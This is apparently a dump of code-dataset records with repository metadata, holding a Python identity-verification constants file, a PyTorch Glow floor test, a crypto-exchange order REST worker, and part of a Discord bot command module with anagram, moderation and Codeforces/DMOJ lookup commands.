'primary phone is commercial',
'primary address is valid',
'primary address diagnostic',
'primary address to name',
'primary address type',
'primary address is active',
'primary address is commercial',
'primary address is forwarder',
'secondary phone is valid',
'secondary phone to name',
'secondary phone to address',
'secondary phone line type',
'secondary phone is prepaid',
'secondary phone is commercial',
'secondary address is valid',
'secondary address diagnostic',
'secondary address to name',
'secondary address type',
'secondary address is active',
'secondary address is commercial',
'secondary address is forwarder',
'email is valid',
'email is disposable',
'email is auto-generated',
'email to name',
'email first seen days binned',
'ip is valid',
'ip distance from address binned',
'ip distance from phone binned',
'ip is proxy',
'ip connection type',
'confidence score binned',
]
BINS = {
'email first seen days': {
'labels': ['Never', '< 3 months', '3 months to a year', '1-4 years', '5+ years'],
'bins': [0, 1, 180, 365, 1825, np.inf],
},
'ip distance from address': {
'labels': ['0-9', '10-99', '100-999', '1000+'],
'bins': [0, 10, 100, 1000, np.inf],
},
'ip distance from phone': {
'labels': ['0-9', '10-99', '100-999', '1000+'],
'bins': [0, 10, 100, 1000, np.inf],
},
'confidence score': {
'bins': np.arange(0,525,25),
'labels': ['0-25', '25-50', '50-75', '75-100', '100-125', '125-150',
'150-175', '175-200', '200-225', '225-250', '250-275',
'275-300', '300-325', '325-350', '350-375', '375-400',
'400-425', '425-450', '450-475', '475-500',],
},
}
to_name = [
'Match',
'No match',
'No name found',
]
to_address = [
'Match',
'Zip+4 match',
'Postal match',
'City/State match',
'No match',
]
line_type = [
'Mobile',
'Landline',
'Fixed VOIP',
'Non-fixed VOIP',
'Premium',
'Tollfree',
'Voicemail',
'Other',
'Unknown',
]
address_type = [
'Commercial mail drop',
'Multi unit',
'Single unit',
'PO box',
'PO box throwback',
'Unknown address type',
]
address_diagnostic = [
'Validated',
'Validated with corrections',
'Validated only Street, Postcode, City, Country. Premise not validated',
'Validated only Postcode, City, Country',
'Validated only City, Country',
'Validated only Country',
]
CATEGORIES = {
'primary phone to name': to_name,
'secondary phone to name': to_name,
'primary address to name': to_name,
'secondary address to name': to_name,
'email to name': to_name,
'primary phone to address': to_address,
'secondary phone to address': to_address,
'primary phone line type': line_type,
'secondary phone line type': line_type,
'primary address type': address_type,
'secondary address type': address_type,
'primary address diagnostic': address_diagnostic,
'secondary address diagnostic': address_diagnostic,
'ip connection type': [
'Cable/DSL',
'Corporate',
'Cellular',
'Dialup',
],
} | 27.864 | 89 | 0.588286 | import numpy as np
OUTPUTS = [
'primary phone is valid',
'primary phone to name',
'primary phone to address',
'primary phone line type',
'primary phone is prepaid',
'primary phone is commercial',
'primary address is valid',
'primary address diagnostic',
'primary address to name',
'primary address type',
'primary address is active',
'primary address is commercial',
'primary address is forwarder',
'secondary phone is valid',
'secondary phone to name',
'secondary phone to address',
'secondary phone line type',
'secondary phone is prepaid',
'secondary phone is commercial',
'secondary address is valid',
'secondary address diagnostic',
'secondary address to name',
'secondary address type',
'secondary address is active',
'secondary address is commercial',
'secondary address is forwarder',
'email is valid',
'email is disposable',
'email is auto-generated',
'email to name',
'email first seen days binned',
'ip is valid',
'ip distance from address binned',
'ip distance from phone binned',
'ip is proxy',
'ip connection type',
'confidence score binned',
]
BINS = {
'email first seen days': {
'labels': ['Never', '< 3 months', '3 months to a year', '1-4 years', '5+ years'],
'bins': [0, 1, 180, 365, 1825, np.inf],
},
'ip distance from address': {
'labels': ['0-9', '10-99', '100-999', '1000+'],
'bins': [0, 10, 100, 1000, np.inf],
},
'ip distance from phone': {
'labels': ['0-9', '10-99', '100-999', '1000+'],
'bins': [0, 10, 100, 1000, np.inf],
},
'confidence score': {
'bins': np.arange(0,525,25),
'labels': ['0-25', '25-50', '50-75', '75-100', '100-125', '125-150',
'150-175', '175-200', '200-225', '225-250', '250-275',
'275-300', '300-325', '325-350', '350-375', '375-400',
'400-425', '425-450', '450-475', '475-500',],
},
}
to_name = [
'Match',
'No match',
'No name found',
]
to_address = [
'Match',
'Zip+4 match',
'Postal match',
'City/State match',
'No match',
]
line_type = [
'Mobile',
'Landline',
'Fixed VOIP',
'Non-fixed VOIP',
'Premium',
'Tollfree',
'Voicemail',
'Other',
'Unknown',
]
address_type = [
'Commercial mail drop',
'Multi unit',
'Single unit',
'PO box',
'PO box throwback',
'Unknown address type',
]
address_diagnostic = [
'Validated',
'Validated with corrections',
'Validated only Street, Postcode, City, Country. Premise not validated',
'Validated only Postcode, City, Country',
'Validated only City, Country',
'Validated only Country',
]
CATEGORIES = {
'primary phone to name': to_name,
'secondary phone to name': to_name,
'primary address to name': to_name,
'secondary address to name': to_name,
'email to name': to_name,
'primary phone to address': to_address,
'secondary phone to address': to_address,
'primary phone line type': line_type,
'secondary phone line type': line_type,
'primary address type': address_type,
'secondary address type': address_type,
'primary address diagnostic': address_diagnostic,
'secondary address diagnostic': address_diagnostic,
'ip connection type': [
'Cable/DSL',
'Corporate',
'Cellular',
'Dialup',
],
} | true | true |
f722f728e24b6a6184391e65e7e980e2d7ffd119 | 566 | py | Python | torch_glow/tests/nodes/floor_test.py | aksingh-fb/glow | c50603a1885c9bffd935fbd1c7c10766b062cef9 | [
"Apache-2.0"
] | 1 | 2021-04-10T09:05:08.000Z | 2021-04-10T09:05:08.000Z | torch_glow/tests/nodes/floor_test.py | aksingh-fb/glow | c50603a1885c9bffd935fbd1c7c10766b062cef9 | [
"Apache-2.0"
] | null | null | null | torch_glow/tests/nodes/floor_test.py | aksingh-fb/glow | c50603a1885c9bffd935fbd1c7c10766b062cef9 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from tests import utils
class SimpleFloorModule(torch.nn.Module):
def forward(self, a, b):
c = a + b
return torch.floor(c)
class TestFloor(unittest.TestCase):
def test_floor(self):
"""Basic test of the PyTorch floor Node on Glow."""
x = torch.randn(3, 4, 5)
y = torch.randn(3, 4, 5)
utils.compare_tracing_methods(
SimpleFloorModule(), x, y, fusible_ops={"aten::floor"}
)
| 23.583333 | 82 | 0.64841 | from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from tests import utils
class SimpleFloorModule(torch.nn.Module):
def forward(self, a, b):
c = a + b
return torch.floor(c)
class TestFloor(unittest.TestCase):
def test_floor(self):
x = torch.randn(3, 4, 5)
y = torch.randn(3, 4, 5)
utils.compare_tracing_methods(
SimpleFloorModule(), x, y, fusible_ops={"aten::floor"}
)
| true | true |
f722f91702759297291a44f2edab97ddb2be4884 | 3,957 | py | Python | src/rest.py | thibaultyou/grid-bot | 9c360c00ec3e87eb639fb5e2ee755d2dec77bcc9 | [
"MIT"
] | 4 | 2022-03-06T03:51:03.000Z | 2022-03-08T14:19:31.000Z | src/rest.py | thibaultyou/grid-bot | 9c360c00ec3e87eb639fb5e2ee755d2dec77bcc9 | [
"MIT"
] | null | null | null | src/rest.py | thibaultyou/grid-bot | 9c360c00ec3e87eb639fb5e2ee755d2dec77bcc9 | [
"MIT"
] | null | null | null | import logging
import time
from threading import Thread
from src.events import CREATE_LIMIT_ORDER, CREATE_MARKET_ORDER, GRID_INIT, GRID_RESET, ORDERS, POSITION, REMOVE_ALL_LIMIT_ORDERS, REMOVE_LIMIT_ORDER, REMOVE_MARKET_ORDER
from src.sessions import SESSIONS, get_session
class RestWorker:
def start(self, executions, events):
t = Thread(target=self._run, args=(executions, events))
t.start()
# TODO improve
def _run(self, executions, events):
while True:
if (len(executions)):
# print(executions)
ex = executions.popleft()
try:
if (len(ex) == 2 and ex[0] == ORDERS):
orders = get_session().fetchOpenOrders(ex[1])
events.append((ORDERS, orders))
elif (len(ex) == 2 and ex[0] == POSITION):
positions = get_session().fetchPositions()
for position in positions:
if ('info' in position and 'future' in position['info'] and position['info']['future'] == ex[1]):
events.append((POSITION, position['info']))
if (len(positions) == 0):
events.append((POSITION, None))
elif (len(ex) == 4 and ex[0] == CREATE_MARKET_ORDER):
order = get_session().createOrder(
ex[1], 'market', ex[2], ex[3])
events.append((CREATE_MARKET_ORDER, order))
elif (len(ex) == 5 and ex[0] == CREATE_LIMIT_ORDER):
order = get_session().createOrder(
ex[1], 'limit', ex[2], ex[3], ex[4])
events.append((CREATE_LIMIT_ORDER, order))
elif (len(ex) == 2 and (ex[0] == GRID_INIT or ex[0] == GRID_RESET)):
positions = get_session().fetchPositions()
position = None
# TODO improve
for p in positions:
if ('info' in p and 'future' in p['info'] and p['info']['future'] == ex[1]):
position = p['info']
time.sleep(0.25 / len(SESSIONS))
ticker = get_session().fetchTicker(ex[1])
if (ex[0] == GRID_RESET):
events.append((GRID_INIT, ticker, position, True))
else:
events.append((GRID_INIT, ticker, position))
elif (len(ex) == 2 and ex[0] == REMOVE_MARKET_ORDER):
positions = get_session().fetchPositions()
for position in positions:
if ('info' in position and 'side' in position['info'] and 'size' in position['info'] and 'future' in position['info'] and position['info']['future'] == ex[1]):
side = 'buy' if position['info']['side'] == 'sell' else 'sell'
get_session().createOrder(
ex[1], 'market', side, position['info']['size'])
events.append((REMOVE_MARKET_ORDER))
elif (len(ex) == 2 and ex[0] == REMOVE_LIMIT_ORDER):
get_session().cancelOrder(ex[1])
events.append((REMOVE_LIMIT_ORDER))
elif (len(ex) == 2 and ex[0] == REMOVE_ALL_LIMIT_ORDERS):
get_session().cancelAllOrders(ex[1])
events.append((REMOVE_ALL_LIMIT_ORDERS))
time.sleep(0.25 / len(SESSIONS))
except Exception as e:
logging.error(f'FtxRestWorker exception: {e}')
time.sleep(0.05) | 57.347826 | 188 | 0.468789 | import logging
import time
from threading import Thread
from src.events import CREATE_LIMIT_ORDER, CREATE_MARKET_ORDER, GRID_INIT, GRID_RESET, ORDERS, POSITION, REMOVE_ALL_LIMIT_ORDERS, REMOVE_LIMIT_ORDER, REMOVE_MARKET_ORDER
from src.sessions import SESSIONS, get_session
class RestWorker:
def start(self, executions, events):
t = Thread(target=self._run, args=(executions, events))
t.start()
def _run(self, executions, events):
while True:
if (len(executions)):
ex = executions.popleft()
try:
if (len(ex) == 2 and ex[0] == ORDERS):
orders = get_session().fetchOpenOrders(ex[1])
events.append((ORDERS, orders))
elif (len(ex) == 2 and ex[0] == POSITION):
positions = get_session().fetchPositions()
for position in positions:
if ('info' in position and 'future' in position['info'] and position['info']['future'] == ex[1]):
events.append((POSITION, position['info']))
if (len(positions) == 0):
events.append((POSITION, None))
elif (len(ex) == 4 and ex[0] == CREATE_MARKET_ORDER):
order = get_session().createOrder(
ex[1], 'market', ex[2], ex[3])
events.append((CREATE_MARKET_ORDER, order))
elif (len(ex) == 5 and ex[0] == CREATE_LIMIT_ORDER):
order = get_session().createOrder(
ex[1], 'limit', ex[2], ex[3], ex[4])
events.append((CREATE_LIMIT_ORDER, order))
elif (len(ex) == 2 and (ex[0] == GRID_INIT or ex[0] == GRID_RESET)):
positions = get_session().fetchPositions()
position = None
for p in positions:
if ('info' in p and 'future' in p['info'] and p['info']['future'] == ex[1]):
position = p['info']
time.sleep(0.25 / len(SESSIONS))
ticker = get_session().fetchTicker(ex[1])
if (ex[0] == GRID_RESET):
events.append((GRID_INIT, ticker, position, True))
else:
events.append((GRID_INIT, ticker, position))
elif (len(ex) == 2 and ex[0] == REMOVE_MARKET_ORDER):
positions = get_session().fetchPositions()
for position in positions:
if ('info' in position and 'side' in position['info'] and 'size' in position['info'] and 'future' in position['info'] and position['info']['future'] == ex[1]):
side = 'buy' if position['info']['side'] == 'sell' else 'sell'
get_session().createOrder(
ex[1], 'market', side, position['info']['size'])
events.append((REMOVE_MARKET_ORDER))
elif (len(ex) == 2 and ex[0] == REMOVE_LIMIT_ORDER):
get_session().cancelOrder(ex[1])
events.append((REMOVE_LIMIT_ORDER))
elif (len(ex) == 2 and ex[0] == REMOVE_ALL_LIMIT_ORDERS):
get_session().cancelAllOrders(ex[1])
events.append((REMOVE_ALL_LIMIT_ORDERS))
time.sleep(0.25 / len(SESSIONS))
except Exception as e:
logging.error(f'FtxRestWorker exception: {e}')
time.sleep(0.05) | true | true |
f722f9d0617429fd42b883604d1c256fe2b1edf7 | 52,903 | py | Python | src/commands.py | hyper-neutrino/bots-reforged | cbb4d34f2e40d460301077c8d58d3619e71f4406 | [
"MIT"
] | null | null | null | src/commands.py | hyper-neutrino/bots-reforged | cbb4d34f2e40d460301077c8d58d3619e71f4406 | [
"MIT"
] | null | null | null | src/commands.py | hyper-neutrino/bots-reforged | cbb4d34f2e40d460301077c8d58d3619e71f4406 | [
"MIT"
] | null | null | null | import asyncio, datetime, discord, json, pycountry, random, re, requests, time, traceback
from aioconsole import ainput
from word2number import w2n
from client import *
from datamanager import config, del_data, get_data, has_data, mod_data, set_data, batch_set_data
from discordutils import *
from league import *
async def dm(user, *a, **k):
channel = user.dm_channel
if channel is None:
channel = await user.create_dm()
await channel.send(*a, **k)
@client.command("", ["help"], "", "")
@client.command("General Commands", ["help", "rpg"], "help [rpg]", "post a list of commands")
async def command_help(command, message):
sections = {}
for section, _, syntax, description, _ in client.commands:
if section == "" or ((section == "RPG Commands") ^ (len(command) == 3)): continue
if section not in sections:
sections[section] = []
sections[section].append(f"`{syntax}` - {description}")
embed = discord.Embed(
title = "Help - Commands",
color = client.color
)
for section in sections:
embed.add_field(name = section, value = "\n".join(sections[section]), inline = False)
await dm(message.author, embed = embed)
await send(message, "Sent the command list to your DMs!")
@client.command("General Commands", ["ping"], "ping", "check your ping")
async def command_ping(command, message):
ping = int((time.time() - (message.created_at - datetime.datetime(1970, 1, 1)) / datetime.timedelta(seconds = 1)) * 1000)
await send(message, f"Pong! ({ping} ms)", reaction = "🏓")
@client.command("Channel Type Commands", ["subscribe"], "subscribe", "announce updates to this channel")
async def command_subscribe(command, message):
await mod_data("announcement_channels", lambda x: x | {message.channel.id}, default = set())
await send(message, "Subscribed to status updates here!")
@client.command("Channel Type Commands", ["unsubscribe"], "unsubscribe", "stop announcing updates to this channel")
async def command_unsubscribe(command, message):
await mod_data("announcement_channels", lambda x: x - {message.channel.id}, default = set())
await send(message, "Unsubscribed from status updates here!")
@client.command("Channel Type Commands", ["watch", ("osu", "genshin")], "watch osu/genshin", "watch osu!/Genshin Impact updates here")
async def command_watch(command, message):
await mod_data("watch_channels", command[2], lambda x: x | {message.channel.id}, default = set())
await send(message, "Now watching " + {"osu": "osu!", "genshin": "Genshin Impact"}[command[2]] + " updates in this channel!")
@client.command("Channel Type Commands", ["unwatch", ("osu", "genshin")], "unwatch osu/genshin", "stop watching osu!/Genshin Impact updates here")
async def command_watch(command, message):
await mod_data("watch_channels", command[2], lambda x: x - {message.channel.id}, default = set())
await send(message, "No longer watching " + {"osu": "osu!", "genshin": "Genshin Impact"}[command[2]] + " updates in this channel!")
words = None
wordmap = {}
with open("data/words.txt") as f:
words = [x for x in f.read().strip().splitlines() if 5 <= len(x)]
for word in words:
key = "".join(sorted(word))
if key not in wordmap:
wordmap[key] = set()
wordmap[key].add(word)
anagram_lock = asyncio.Lock()
def display(actual, scrambled, hint):
if hint == 0: return scrambled
cl = list(scrambled)
start = actual[:hint if hint * 2 <= len(actual) else -hint]
end = actual[-hint:]
for c in start + end:
cl.remove(c)
return f"**{start}**{''.join(cl)}**{end}**"
async def anagram_function(message, answer = None, start = False, stop = False, hint = False, reorder = False):
global words, wordmap
async with anagram_lock:
active = await has_data("anagram", message.channel.id, "puzzle")
puzzle = await get_data("anagram", message.channel.id, "puzzle", default = "", set_if_missing = False)
answers = wordmap.get("".join(sorted(puzzle)), set())
current_hint = await get_data("anagram", message.channel.id, "hint", default = 0, set_if_missing = False)
if reorder:
if active:
charlist = list(puzzle)
random.shuffle(charlist)
puzzle = "".join(charlist)
await set_data("anagram", message.channel.id, "puzzle", puzzle)
await send(message, f"Reordered: solve for '{display(sorted(answers)[0], puzzle, current_hint)}' ({len(puzzle)}).")
else:
await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
if hint:
if active:
if len(puzzle) - current_hint * 2 - 2 <= 1:
stop = True
else:
await set_data("anagram", message.channel.id, "hint", current_hint + 1)
await send(message, f"Hint: 2 more letters shown: solve for '{display(sorted(answers)[0], puzzle, current_hint + 1)}' ({len(puzzle)}).")
else:
await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
if stop:
if active:
if len(answers) == 1:
await send(message, f"Anagram puzzle ended! The correct answer was '{list(answers)[0]}'.")
else:
await send(message, f"Anagram puzzle ended! The correct answers were {english_list(quote(answers))}.")
await del_data("anagram", message.channel.id)
active = False
else:
await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
if active and answer in answers:
try:
points = len(answer) - 2 * await get_data("anagram", message.channel.id, "hint")
bonus = int(points / 2) * (time.time() - await get_data("anagram", message.channel.id, "timestamp", default = 0) <= 5)
await mod_data("leaderboard", "anagram", message.author.id, lambda x: x + points + bonus, default = 0)
await batch_set_data("anagram", message.channel.id, active = False, last = answers, lasttime = time.time())
active = False
bonus_display = f" **+{bonus}**" if bonus else ""
alt_display = f" (Alternative answers: {english_list(quote(answers - {answer}))})" if len(answers) > 1 else ""
await send(message, f"Congratulations to {message.author.mention} for winning the anagram puzzle! (+{points}{bonus_display}){alt_display}", allowed_mentions = discord.AllowedMentions.none())
start = True
except:
print(traceback.format_exc())
elif answer in await get_data("anagram", message.channel.id, "last", default = set()) and time.time() - await get_data("anagram", message.channel.id, "lasttime", default = 0) <= 1:
await send(message, f"{message.author.mention} L", reaction = "x", allowed_mentions = discord.AllowedMentions.none())
if start:
if active:
hint = await get_data("anagram", message.channel.id, "hint", default = 0)
actual = sorted(answers)[0]
await send(message, f"An anagram puzzle is already running! Solve for '{display(actual, puzzle, hint)}' ({len(puzzle)}).", reaction = "x")
else:
word = random.choice(words)
charlist = list(word)
random.shuffle(charlist)
scrambled = "".join(charlist)
await batch_set_data("anagram", message.channel.id, active = True, puzzle = scrambled, hint = 0, timestamp = time.time())
await send(message, f"Anagram puzzle! Solve for '{scrambled}' ({len(word)}).")
@client.command("Anagram Commands", ["anagram"], "anagram start", "start an anagram puzzle")
async def command_anagram_start(command, message):
await anagram_function(message, start = True)
@client.command("Anagram Commands", ["anagram", "restart"], "anagram restart", "restart the anagram puzzle")
async def command_anagram_restart(command, message):
await anagram_function(message, stop = True, start = True)
@client.command("Anagram Commands", ["anagram", "stop"], "anagram stop", "stop the anagram puzzle")
async def command_anagram_stop(command, message):
await anagram_function(message, stop = True)
@client.command("Anagram Commands", ["anagram", "shuffle"], "anagram shuffle", "alias for `anagram reorder`")
@client.command("Anagram Commands", ["anagram", "scramble"], "anagram scramble", "alias for `anagram reorder`")
@client.command("Anagram Commands", ["anagram", "reorder"], "anagram reorder", "reorder the anagram puzzle")
async def command_anagram_reorder(command, message):
await anagram_function(message, reorder = True)
@client.command("Anagram Commands", ["anagram", "hint"], "anagram hint", "show another character in the anagram puzzle")
async def command_anagram_hint(command, message):
await anagram_function(message, hint = True)
@client.command("Anagram Commands", ["anagram", "add", "?"], "anagram add <word>", "add a word to the anagram dictionary")
async def command_anagram_add(command, message):
global words, wordmap
word = command[3].strip().lower()
if all(char in "abcdefghijklmnopqrstuvwxyz" for char in word):
if word in words:
await send(message, "This word is already in the dictionary!", reaction = "x")
else:
words.append(word)
words.sort()
with open("data/words.txt", "w") as f:
f.write("\n".join(words))
key = "".join(sorted(word))
if key not in wordmap:
wordmap[key] = set()
wordmap[key].add(word)
await send(message, f"Added '{word}' to the dictionary!")
else:
await send(message, "Words must only contain letters!", reaction = "x")
@client.command("Anagram Commands", ["anagram", "rm", "?"], "anagram rm <word>", "alias for `anagram remove`")
@client.command("Anagram Commands", ["anagram", "remove", "?"], "anagram remove <word>", "remove a word from the anagram dictionary")
async def command_anagram_remove(command, message):
global words, wordmap
word = command[3].strip().lower()
if word in words:
words.remove(word)
with open("data/words.txt", "w") as f:
f.write("\n".join(words))
key = "".join(sorted(word))
wordmap[key].discard(word)
await send(message, f"Removed '{word}' from the dictionary!")
else:
await send(message, "This word is not in the dictionary!", reaction = "x")
@client.command("Anagram Commands", ["anagram", "lb"], "anagram lb", "alias for `anagram leaderboard`")
@client.command("Anagram Commands", ["anagram", "leaderboard"], "anagram leaderboard", "show the leaderboard for the anagram puzzle")
async def command_anagram_leaderboard(command, message):
scores = []
scoremap = await get_data("leaderboard", "anagram")
for member in message.guild.members:
score = scoremap.get(member.id, 0)
if score:
scores.append((score, member))
scores.sort(reverse = True)
await send(message, embed = discord.Embed(
title = "Leaderboard - Anagram",
description = "\n".join(f"{member.mention} - {score}" for score, member in scores)
))
@client.command("", lambda m: True, "", "")
async def command_anagram_answer(command, message):
try:
await anagram_function(message, answer = message.content.strip().strip("!@#$%^&*()[]{}/|\.,<>\"'").lower())
except:
pass
@client.command("User Commands", ["alias", "?", "?"], "alias <name> <user>", "alias a name to a user")
async def command_alias(command, message):
member = await get_member(message.guild, command[3], message.author)
await set_data("aliases", message.guild.id, command[2].lower(), member.id)
await send(message, f"Aliased '{command[2].lower()}' to {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
@client.command("User Commands", ["unalias", "?"], "unalias <name>", "remove a name's alias")
async def command_unalias(command, message):
await set_data("aliases", message.guild.id, command[2].lower(), None)
await send(message, f"Removed the alias for '{command[2].lower()}'!")
@client.command("User Commands", ["unbonk", "?", "..."], "unbonk <user>", "alias for `unignore`")
@client.command("User Commands", ["unignore", "?", "..."], "unignore <user>", "make the bot no longer ignore messages from a particular user (on a server)")
@client.command("User Commands", ["bonk", "?", "..."], "bonk <user>", "alias for `ignore`")
@client.command("User Commands", ["ignore", "?", "..."], "ignore <user>", "make the bot ignore all messages from a particular user (on a server)")
async def command_ignore(command, message):
for uinfo in command[2:]:
member = await get_member(message.guild, uinfo, message.author)
if not command[1].startswith("un") and member == message.author:
await send(message, f"You cannot {command[1]} yourself!", reaction = "x")
else:
await set_data("ignore", message.guild.id, member.id, not command[1].startswith("un"))
await send(message, f"No longer ignoring {member.mention}!" if command[1].startswith("un") else f"{'Bonk! ' * (command[1] == 'bonk')}Now ignoring {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
@client.command("User Commands", ["unshut", "?", "..."], "unbonk <user>", "alias for `unsilence`")
@client.command("User Commands", ["unsilence", "?", "..."], "unignore <user>", "make the bot delete messages from a particular user (on a server)")
@client.command("User Commands", ["shut", "?", "..."], "bonk <user>", "alias for `silence`")
@client.command("User Commands", ["silence", "?", "..."], "ignore <user>", "make the bot delete messages from a particular user (on a server)")
async def command_silence(command, message):
for uinfo in command[2:]:
member = await get_member(message.guild, uinfo, message.author)
if not command[1].startswith("un") and member == message.author:
await send(message, f"You cannot {command[1]} yourself!", reaction = "x")
else:
await set_data("silence", message.guild.id, member.id, not command[1].startswith("un"))
await send(message, f"No longer silencing {member.mention}!" if command[1].startswith("un") else f"{'https://i.redd.it/l5jmlb1ltqj51.jpg' * (command[1] == 'shut')}Now silencing {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
# @client.command("Role Commands", ["gib", "?", "..."], "gib <name> [roles...]", "alias for `role give`")
# @client.command("Role Commands", ["role", "give", "?", "..."], "role give <name> [roles...]", "give a list of roles to a user")
# async def command_role_give(command, message):
# user, *names = command[2 if command[1] == "gib" else 3:]
# member = await get_member(message.guild, user, message.author)
# roles = [get_role(message.guild, string) for string in names]
# if any(role.id == 741731868692709416 for role in roles) and member.id != 251082987360223233:
# await send(message, f"<@&741731868692709416> is exclusive to <@!251082987360223233>!", allowed_mentions = discord.AllowedMentions.none())
# else:
# await member.add_roles(*roles)
# await send(message, f"Granted {english_list(quote(role.mention for role in roles))} to {member.mention}!", allowed_mentions = discord.AllowedMentions(roles = False))
# @client.command("Role Commands", ["gibnt", "?", "..."], "gibnt <name> [roles...]", "alias for `role remove`")
# @client.command("Role Commands", ["role", "remove", "?", "..."], "role remove <name> [roles...]", "remove a list of roles from a user")
# async def command_role_remove(command, message):
# user, *names = command[2 if command[1] == "gibnt" else 3:]
# member = await get_member(message.guild, user, message.author)
# roles = [get_role(message.guild, string) for string in names]
# await member.remove_roles(*roles)
# await send(message, f"Removed {english_list(quote(role.mention for role in roles))} from {member.mention}!", allowed_mentions = discord.AllowedMentions(roles = False))
@client.command("", ["role", "colour", "?"], "", "")
@client.command("", ["role", "color", "?"], "", "")
@client.command("Role Commands", ["role", "colour", "?", "?"], "role colour <role> [colour = 0]", "alias for `role color`")
@client.command("Role Commands", ["role", "color", "?", "?"], "role color <role> [color = 0]", "recolor a role, or remove its color")
async def command_role_color(command, message):
role = get_role(message.guild, command[3])
await role.edit(color = get_color(command[4] if len(command) > 4 else "0"))
await send(message, f"Recolored '{role.mention}'!", allowed_mentions = discord.AllowedMentions.none())
@client.command("Role Commands", ["role", "rename", "?", "?"], "role rename <role> <name>", "rename a role")
async def command_role_rename(command, message):
role = get_role(message.guild, command[3])
name = role.name
await role.edit(name = command[4])
await send(message, f"Renamed '{name}' to '{command[4]}'!")
services = {
"lol": "lol",
"league": "lol",
"dmoj": "dmoj",
"cf": "cf",
"codeforces": "cf",
"osu": "osu",
"ow": "ow",
"overwatch": "ow"
}
service_list = tuple(services)
@client.command("", [service_list, "link", "?"], "", "")
@client.command("External User Commands", [service_list, "link", "?", "?"], "<lol/league | cf/codeforces | dmoj | osu | ow/overwatch> link [user = me] <account>", "link a user to an external account")
async def command_link(command, message):
service = services[command[1]]
member = await get_member(message.guild, command[3] if len(command) == 5 else "me", message.author)
await set_data("external", service, member.id, command[-1])
await send(message, f"Linked {member.mention} to {command[-1]}!", allowed_mentions = discord.AllowedMentions.none())
@client.command("", [service_list, "unlink"], "", "")
@client.command("External User Commands", [service_list, "unlink", "?"], "<lol/league | cf/codeforces | dmoj | osu | ow/overwatch> unlink [user = me]", "unlink a user from a service")
async def command_link(command, message):
service = services[command[1]]
member = await get_member(message.guild, command[3] if len(command) == 4 else "me", message.author)
await del_data("external", service, member.id)
await send(message, f"Unlinked {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
async def get_ext_user(key, error, command, message):
if len(command) == 3:
if await has_data("external", key, message.author.id):
return await get_data("external", key, message.author.id)
else:
raise BotError(f"You are not linked; please specify {error} or link yourself first!")
else:
try:
member = await get_member(message.guild, command[3], message.author)
if await has_data("external", key, member.id):
return await get_data("external", key, member.id)
except:
pass
return command[3]
@client.command("", [("cf", "codeforces"), ("details", "rank", "rating")], "", "")
@client.command("External User Commands", [("cf", "codeforces"), ("details", "rank", "rating"), "?"], "cf/codeforces <details | rank/rating> [user = me]", "report a codeforces user's public details or just rank+rating")
async def command_cf_details(command, message):
cf = await get_ext_user("cf", "a codeforces user", command, message)
rv = requests.get("https://codeforces.com/api/user.info?handles=" + cf).json()
if rv["status"] == "OK":
cfdata = rv["result"][0]
if command[2] == "rank" or command[2] == "rating":
await send(message, f"{cf} is rank {cfdata['rank']} [{cfdata['rating']}] (max {cfdata['maxRank']} [{cfdata['maxRating']}])!")
else:
embed = discord.Embed(title = cf, color = client.color, url = "https://codeforces.com/profile/" + cf).set_thumbnail(url = "http:" + cfdata["avatar"])
for key, name in [
("email", "Email Address"),
("firstName", "First Name"),
("lastName", "Last Name"),
("organization", "Organization"),
("contribution", "Contribution"),
("friendOfCount", "Friend Of #")
]:
if cfdata.get(key):
embed.add_field(name = name, value = str(cfdata[key]))
if cfdata.get("country") or cfdata.get("city"):
city = f"{cfdata['city']}, " if cfdata.get("city") else ""
embed.add_field(name = "Location", value = f"{city}{cfdata['country']}")
embed.add_field(name = "Current Rank", value = f"{cfdata['rank']} [{cfdata['rating']}]")
embed.add_field(name = "Maximum Rank", value = f"{cfdata['maxRank']} [{cfdata['maxRating']}]")
embed.add_field(name = "Registered Since", value = datetime.datetime.fromtimestamp(cfdata["registrationTimeSeconds"]).strftime("%B %d, %Y at %H:%M:%S"))
embed.add_field(name = "Last Seen Online", value = datetime.datetime.fromtimestamp(cfdata["lastOnlineTimeSeconds"]).strftime("%B %d, %Y at %H:%M:%S"))
await send(message, embed = embed)
else:
await send(message, f"'{cf}' is not a codeforces user!", reaction = "x")
def dmoj_api(URL):
rv = requests.get(URL)
if rv.status_code != 200:
raise BotError(f"'{URL}' returned status {rv.status_code} (not 200)!")
data = rv.json()
if "error" in data:
raise BotError("Error fetching from DMOJ API; likely item does not exist!")
if "data" not in data:
raise BotError("Data not found; check the URL!")
return data["data"]
@client.command("", ["dmoj", ("details", "rank", "rating")], "", "")
@client.command("External User Commands", ["dmoj", ("details", "rank", "rating"), "?"], "dmoj <details | rank/rating> [user = me]", "report a DMOJ user's public details or just rank+rating")
async def command_dmoj_details(command, message):
dm = await get_ext_user("dmoj", "a DMOJ user", command, message)
dmdata = dmoj_api("https://dmoj.ca/api/v2/user/" + dm)["object"]
rating = dmdata["rating"]
if rating < 1000:
rank = "Newbie"
elif rating < 1200:
rank = "Amateur"
elif rating < 1500:
rank = "Expert"
elif rating < 1800:
rank = "Candidate Master"
elif rating < 2200:
rank = "Master"
elif rating < 3000:
rank = "Grandmaster"
else:
rank = "Target"
if dmdata["rank"] == "admin":
rank += " (Admin)"
if command[2] == "rank" or command[2] == "rating":
await send(message, f"{dmdata['username']} is rank {rank} [{rating}]!")
elif command[2] == "details":
await send(message, embed = discord.Embed(
title = dmdata["username"],
color = 0x3333AA,
url = "https://dmoj.ca/user/" + dmdata["username"]
).add_field(
name = "Points",
value = "%.2f" % dmdata["points"]
).add_field(
name = "Solved Problems",
value = str(dmdata["problem_count"])
).add_field(
name = "Contests",
value = str(len(dmdata["contests"]))
).add_field(
name = "Organizations",
value = ", ".join(org["short_name"] for org in dmoj_api("https://dmoj.ca/api/v2/organizations")["objects"] if org["id"] in dmdata["organizations"])
).add_field(
name = "Rank",
value = rank
).add_field(
name = "Rating",
value = str(rating)
))
@client.command("", ["osu", ("details", "summary")], "", "")
